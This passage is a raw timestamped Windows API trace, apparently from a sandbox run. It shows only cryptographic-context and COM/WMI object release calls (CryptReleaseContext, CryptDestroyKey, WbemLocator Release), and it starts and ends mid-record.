[0204.553] CryptReleaseContext (hProv=0xbdf6a0, dwFlags=0x0) returned 1 [0204.554] CryptDestroyKey (hKey=0xb7fbd0) returned 1 [0204.554] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0204.554] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0204.958] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0204.959] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.959] WbemLocator:IUnknown:Release (This=0x6027220) returned 0x1 [0204.959] WbemLocator:IUnknown:Release (This=0x6027220) returned 0x0 [0204.959] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0204.959] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x1 [0204.959] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x0 [0204.959] IUnknown:Release (This=0x6028b10) returned 0x0 [0204.959] IUnknown:Release (This=0x6027fe8) returned 0x0 [0204.959] IUnknown:Release (This=0x6028180) returned 0x0 [0204.960] CryptDestroyKey (hKey=0xb7f310) returned 1 [0204.960] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0204.960] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0205.705] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0205.705] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0205.705] WbemLocator:IUnknown:Release (This=0x60272c0) returned 0x1 [0205.705] WbemLocator:IUnknown:Release (This=0x60272c0) returned 0x0 [0205.706] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0205.706] WbemLocator:IUnknown:Release (This=0x60272b0) returned 0x1 [0205.706] WbemLocator:IUnknown:Release (This=0x60272b0) returned 0x0 [0205.706] IUnknown:Release (This=0x6027fe8) returned 0x0 [0205.706] IUnknown:Release (This=0x6028180) returned 0x0 [0205.706] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0205.707] CryptDestroyKey (hKey=0xb7f310) returned 1 [0205.707] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0206.079] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0206.079] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0206.079] WbemLocator:IUnknown:Release (This=0x6027320) returned 0x1 [0206.079] WbemLocator:IUnknown:Release (This=0x6027320) returned 0x0 [0206.079] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0206.079] WbemLocator:IUnknown:Release (This=0x60272e0) returned 0x1 [0206.079] WbemLocator:IUnknown:Release (This=0x60272e0) returned 0x0 [0206.079] CryptDestroyKey (hKey=0xb7fb10) returned 1 [0206.079] CryptReleaseContext (hProv=0xbe03e8, dwFlags=0x0) returned 1 [0206.079] CryptReleaseContext (hProv=0xbe03e8, dwFlags=0x0) returned 1 [0206.080] CryptDestroyKey (hKey=0xb7f650) returned 1 [0206.080] CryptReleaseContext (hProv=0xbdffa8, dwFlags=0x0) returned 1 [0206.080] CryptReleaseContext (hProv=0xbdffa8, dwFlags=0x0) returned 1 [0206.080] CryptDestroyKey (hKey=0xb7f1d0) returned 1 [0206.080] CryptReleaseContext (hProv=0xbdf508, dwFlags=0x0) returned 1 [0206.080] CryptReleaseContext (hProv=0xbdf508, dwFlags=0x0) returned 1 [0206.952] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0206.952] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0206.952] WbemLocator:IUnknown:Release (This=0x60273e0) returned 0x1 [0206.952] WbemLocator:IUnknown:Release (This=0x60273e0) returned 0x0 [0206.952] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0206.952] WbemLocator:IUnknown:Release (This=0x6027400) returned 0x1 [0206.952] WbemLocator:IUnknown:Release (This=0x6027400) returned 0x0 [0206.952] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0206.952] WbemLocator:IUnknown:Release (This=0x60273c0) returned 0x1 [0206.952] WbemLocator:IUnknown:Release (This=0x60273c0) returned 0x0 [0206.952] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0206.952] WbemLocator:IUnknown:Release (This=0x6027360) returned 0x1 [0206.952] WbemLocator:IUnknown:Release (This=0x6027360) returned 0x0 [0206.952] IUnknown:Release (This=0x6028b10) returned 0x0 [0206.952] IUnknown:Release (This=0x6028648) returned 0x0 [0206.952] IUnknown:Release (This=0x60287e0) returned 0x0 [0206.953] IUnknown:Release (This=0x6028180) returned 0x0 [0206.953] IUnknown:Release (This=0x6027fe8) returned 0x0 [0206.953] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0206.953] CryptReleaseContext (hProv=0xbe0470, dwFlags=0x0) returned 1 [0206.953] CryptReleaseContext (hProv=0xbe0470, dwFlags=0x0) returned 1 [0206.954] CryptDestroyKey (hKey=0xb7f650) returned 1 [0206.954] CryptReleaseContext (hProv=0xbdfd88, dwFlags=0x0) returned 1 [0206.954] CryptDestroyKey (hKey=0xb7f1d0) returned 1 [0206.954] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0206.954] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0206.954] CryptReleaseContext (hProv=0xbdfd88, dwFlags=0x0) returned 1 [0207.331] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0207.332] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.332] WbemDefPath:IUnknown:Release (This=0x602a140) returned 0x1 [0207.332] WbemDefPath:IUnknown:Release (This=0x602a140) returned 0x0 [0207.332] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.332] WbemDefPath:IUnknown:Release (This=0x6029c70) returned 0x1 [0207.332] WbemDefPath:IUnknown:Release (This=0x6029c70) returned 0x0 [0207.332] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.332] WbemDefPath:IUnknown:Release (This=0x602a060) returned 0x1 [0207.332] WbemDefPath:IUnknown:Release (This=0x602a060) returned 0x0 [0207.332] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.332] WbemDefPath:IUnknown:Release (This=0x602a0d0) returned 0x1 [0207.332] WbemDefPath:IUnknown:Release (This=0x602a0d0) returned 0x0 [0207.332] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.332] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x1 [0207.332] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x0 [0207.332] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.332] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x1 [0207.332] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x0 [0207.332] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.332] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x1 [0207.332] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x0 [0207.332] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.332] WbemDefPath:IUnknown:Release (This=0x6029dc0) returned 0x1 [0207.332] WbemDefPath:IUnknown:Release (This=0x6029dc0) returned 0x0 [0207.333] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.333] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x1 [0207.333] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x0 [0207.333] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.333] WbemDefPath:IUnknown:Release (This=0x6029d50) returned 0x1 [0207.333] WbemDefPath:IUnknown:Release (This=0x6029d50) returned 0x0 [0207.333] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.333] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x1 [0207.333] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x0 [0207.333] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.333] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x1 [0207.333] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x0 [0207.333] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.333] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x1 [0207.333] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x0 [0207.333] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.333] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x1 [0207.333] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x0 [0207.333] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.333] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x1 [0207.333] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x0 [0207.333] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.333] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0207.333] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x0 [0207.333] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.333] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x1 [0207.334] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x0 [0207.334] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.334] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x1 [0207.334] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x0 [0207.334] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.334] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x1 [0207.334] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x0 [0207.334] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.334] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x1 [0207.334] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x0 [0207.334] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.334] WbemDefPath:IUnknown:Release (This=0x6031350) returned 0x1 [0207.334] WbemDefPath:IUnknown:Release (This=0x6031350) returned 0x0 [0207.334] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.334] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x1 [0207.334] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x0 [0207.334] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.334] WbemDefPath:IUnknown:Release (This=0x60312e0) returned 0x1 [0207.334] WbemDefPath:IUnknown:Release (This=0x60312e0) returned 0x0 [0207.334] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.334] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x1 [0207.334] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x0 [0207.334] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.334] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0207.334] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x0 [0207.334] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.335] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x1 [0207.335] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x0 [0207.335] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.335] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x1 [0207.335] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x0 [0207.335] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.335] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x1 [0207.335] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x0 [0207.335] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.335] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x1 [0207.335] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x0 [0207.335] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.335] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x1 [0207.335] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x0 [0207.335] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0207.335] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.335] WbemLocator:IUnknown:Release (This=0x6027440) returned 0x1 [0207.335] WbemLocator:IUnknown:Release (This=0x6027440) returned 0x0 [0207.335] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.335] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x1 [0207.335] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x0 [0207.447] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.447] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x1 [0207.447] WbemLocator:IUnknown:Release (This=0x60336e4) returned 0x0 [0207.449] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.449] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x1 [0207.449] WbemLocator:IUnknown:Release (This=0x60337ec) returned 0x0 [0207.449] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.449] WbemLocator:IUnknown:Release (This=0x66b46dc) returned 0x1 [0207.449] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x0 [0207.450] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.450] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x1 [0207.450] WbemLocator:IUnknown:Release (This=0x6033794) returned 0x0 [0207.450] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.450] WbemLocator:IUnknown:Release (This=0x60273e0) returned 0x1 [0207.450] WbemLocator:IUnknown:Release (This=0x60273e0) returned 0x0 [0207.450] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.450] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0207.450] WbemLocator:IUnknown:Release (This=0x603368c) returned 0x0 [0207.451] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.451] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x1 [0207.451] WbemLocator:IUnknown:Release (This=0x6033634) returned 0x0 [0207.452] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.452] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x1 [0207.452] WbemLocator:IUnknown:Release (This=0x60335dc) returned 0x0 [0207.452] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.452] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x1 [0207.452] WbemLocator:IUnknown:Release (This=0x603352c) returned 0x0 [0207.452] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.452] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x1 [0207.452] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x0 [0207.672] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.672] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x1 [0207.672] WbemLocator:IUnknown:Release (This=0x6033214) returned 0x0 [0207.672] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.672] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x1 [0207.672] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x0 [0207.672] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.673] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x1 [0207.673] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x0 [0207.673] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.673] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x1 [0207.673] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x0 [0207.673] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.673] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x1 [0207.673] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x0 [0207.674] IUnknown:Release (This=0x6027e50) returned 0x0 [0207.674] IUnknown:Release (This=0x6027fe8) returned 0x0 [0207.675] CryptDestroyKey (hKey=0xb7f790) returned 1 [0207.675] CryptReleaseContext (hProv=0xbe04f8, dwFlags=0x0) returned 1 [0207.675] CryptReleaseContext (hProv=0xbe04f8, dwFlags=0x0) returned 1 [0207.676] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0207.676] CryptReleaseContext (hProv=0xbe09c0, dwFlags=0x0) returned 1 [0207.676] CryptReleaseContext (hProv=0xbe09c0, dwFlags=0x0) returned 1 [0207.677] CryptDestroyKey (hKey=0xb7f110) returned 1 [0207.677] CryptReleaseContext (hProv=0xbe0580, dwFlags=0x0) returned 1 [0207.677] CryptReleaseContext (hProv=0xbe0580, dwFlags=0x0) returned 1 [0207.811] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0207.811] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.811] WbemLocator:IUnknown:Release (This=0x6027320) returned 0x1 [0207.811] WbemLocator:IUnknown:Release (This=0x6027320) returned 0x0 [0207.811] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.811] WbemLocator:IUnknown:Release (This=0x60272c0) returned 0x1 [0207.811] WbemLocator:IUnknown:Release (This=0x60272c0) returned 0x0 [0207.811] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0207.811] WbemLocator:IUnknown:Release (This=0x60271b0) returned 0x1 [0207.812] WbemLocator:IUnknown:Release (This=0x60271b0) returned 0x0 [0207.812] IUnknown:Release (This=0x6027e50) returned 0x0 [0207.812] IUnknown:Release (This=0x6028180) returned 0x0 [0207.812] IUnknown:Release (This=0x6027fe8) returned 0x0 [0207.812] CryptReleaseContext (hProv=0xbe0b58, dwFlags=0x0) returned 1 [0207.812] CryptDestroyKey (hKey=0xb7f850) returned 1 [0207.812] CryptReleaseContext (hProv=0xbdfd88, dwFlags=0x0) returned 1 [0207.812] CryptReleaseContext (hProv=0xbdfd88, dwFlags=0x0) returned 1 [0207.813] CryptDestroyKey (hKey=0xb7fb50) returned 1 [0207.813] CryptReleaseContext (hProv=0xbe0ad0, dwFlags=0x0) returned 1 [0207.813] CryptReleaseContext (hProv=0xbe0ad0, dwFlags=0x0) returned 1 [0207.813] CryptDestroyKey (hKey=0xb7f490) returned 1 [0207.813] CryptReleaseContext (hProv=0xbe0b58, dwFlags=0x0) returned 1 [0208.091] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0208.091] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0208.091] WbemLocator:IUnknown:Release (This=0x6027210) returned 0x1 [0208.091] WbemLocator:IUnknown:Release (This=0x6027210) returned 0x0 [0208.091] CryptReleaseContext (hProv=0xbdfae0, dwFlags=0x0) returned 1 [0208.091] CryptDestroyKey (hKey=0xb7f650) returned 1 [0208.091] CryptReleaseContext (hProv=0xbdfae0, dwFlags=0x0) returned 1 [0208.465] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0208.465] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0208.466] WbemLocator:IUnknown:Release (This=0x6027310) returned 0x1 [0208.466] WbemLocator:IUnknown:Release (This=0x6027310) returned 0x0 [0208.466] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0208.466] WbemLocator:IUnknown:Release (This=0x6027220) returned 0x1 [0208.466] WbemLocator:IUnknown:Release (This=0x6027220) returned 0x0 [0208.466] CryptReleaseContext (hProv=0xbe0580, dwFlags=0x0) returned 1 [0208.466] CryptReleaseContext (hProv=0xbe0b58, dwFlags=0x0) returned 1 [0208.466] CryptDestroyKey (hKey=0xb7fb10) returned 1 [0208.466] CryptReleaseContext (hProv=0xbe0b58, dwFlags=0x0) returned 1 [0208.467] CryptDestroyKey (hKey=0xb7fc10) returned 1 [0208.467] CryptReleaseContext (hProv=0xbe0580, dwFlags=0x0) returned 1 [0209.149] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0209.149] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.149] WbemLocator:IUnknown:Release (This=0x6027460) returned 0x1 [0209.149] WbemLocator:IUnknown:Release (This=0x6027460) returned 0x0 [0209.150] CryptDestroyKey (hKey=0xb7fc10) returned 1 [0209.150] CryptReleaseContext (hProv=0xbdfae0, dwFlags=0x0) returned 1 [0209.150] CryptReleaseContext (hProv=0xbdfae0, dwFlags=0x0) returned 1 [0209.150] CryptDestroyKey (hKey=0xb7f490) returned 1 [0209.150] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0209.150] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0209.621] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0209.621] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.621] WbemDefPath:IUnknown:Release (This=0x602a290) returned 0x1 [0209.621] WbemDefPath:IUnknown:Release (This=0x602a290) returned 0x0 [0209.621] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.621] WbemDefPath:IUnknown:Release (This=0x602a300) returned 0x1 [0209.622] WbemDefPath:IUnknown:Release (This=0x602a300) returned 0x0 [0209.622] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.622] WbemDefPath:IUnknown:Release (This=0x6029ff0) returned 0x1 [0209.622] WbemDefPath:IUnknown:Release (This=0x6029ff0) returned 0x0 [0209.622] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.622] WbemDefPath:IUnknown:Release (This=0x6029ce0) returned 0x1 [0209.622] WbemDefPath:IUnknown:Release (This=0x6029ce0) returned 0x0 [0209.622] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.622] WbemDefPath:IUnknown:Release (This=0x602a220) returned 0x1 [0209.622] WbemDefPath:IUnknown:Release (This=0x602a220) returned 0x0 [0209.622] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.622] WbemDefPath:IUnknown:Release (This=0x602a1b0) returned 0x1 [0209.622] WbemDefPath:IUnknown:Release (This=0x602a1b0) returned 0x0 [0209.622] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.622] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x1 [0209.622] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x0 [0209.622] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.622] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x1 [0209.622] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x0 [0209.622] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.622] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x1 [0209.622] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x0 [0209.622] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.622] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x1 [0209.622] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x0 [0209.622] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0209.622] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.622] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x1 [0209.623] WbemLocator:IUnknown:Release (This=0x6033844) returned 0x0 [0209.714] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.714] WbemLocator:IUnknown:Release (This=0x60274e0) returned 0x1 [0209.714] WbemLocator:IUnknown:Release (This=0x60274e0) returned 0x0 [0209.714] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.714] WbemLocator:IUnknown:Release (This=0x6027480) returned 0x1 [0209.714] WbemLocator:IUnknown:Release (This=0x6027480) returned 0x0 [0209.714] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.714] WbemLocator:IUnknown:Release (This=0x6027290) returned 0x1 [0209.714] WbemLocator:IUnknown:Release (This=0x6027290) returned 0x0 [0209.714] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.714] WbemLocator:IUnknown:Release (This=0x6027350) returned 0x1 [0209.714] WbemLocator:IUnknown:Release (This=0x6027350) returned 0x0 [0209.714] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.714] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x1 [0209.714] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x0 [0209.716] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.716] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x1 [0209.716] WbemLocator:IUnknown:Release (This=0x60335dc) returned 0x0 [0209.717] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.717] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x1 [0209.717] WbemLocator:IUnknown:Release (This=0x603352c) returned 0x0 [0209.718] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0209.718] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x1 [0209.718] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x0 [0209.721] IUnknown:Release (This=0x6028648) returned 0x0 [0209.721] IUnknown:Release (This=0x6028b10) returned 0x0 [0209.721] IUnknown:Release (This=0x6027e50) returned 0x0 [0209.722] IUnknown:Release (This=0x60287e0) returned 0x0 [0209.722] IUnknown:Release (This=0x6028180) returned 0x0 [0209.722] IUnknown:Release (This=0x6027fe8) returned 0x0 [0209.724] CryptDestroyKey (hKey=0xb7f790) returned 1 [0209.724] CryptReleaseContext (hProv=0xbdfb68, dwFlags=0x0) returned 1 [0209.724] CryptReleaseContext (hProv=0xbdfb68, dwFlags=0x0) returned 1 [0209.725] CryptDestroyKey (hKey=0xb7fa10) returned 1 [0209.725] CryptReleaseContext (hProv=0xbdf838, dwFlags=0x0) returned 1 [0209.725] CryptReleaseContext (hProv=0xbdf838, dwFlags=0x0) returned 1 [0209.725] CryptDestroyKey (hKey=0xb7f890) returned 1 [0209.725] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0209.725] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0209.726] CryptDestroyKey (hKey=0xb7f490) returned 1 [0209.726] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0209.726] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0209.726] CryptDestroyKey (hKey=0xb7f150) returned 1 [0209.726] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0209.726] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0210.712] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0210.712] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0210.712] WbemLocator:IUnknown:Release (This=0x6027500) returned 0x1 [0210.712] WbemLocator:IUnknown:Release (This=0x6027500) returned 0x0 [0210.712] IUnknown:Release (This=0x6028180) returned 0x0 [0210.713] IUnknown:Release (This=0x6027fe8) returned 0x0 [0210.713] IUnknown:Release (This=0x6028b10) returned 0x0 [0210.713] IUnknown:Release (This=0x60287e0) returned 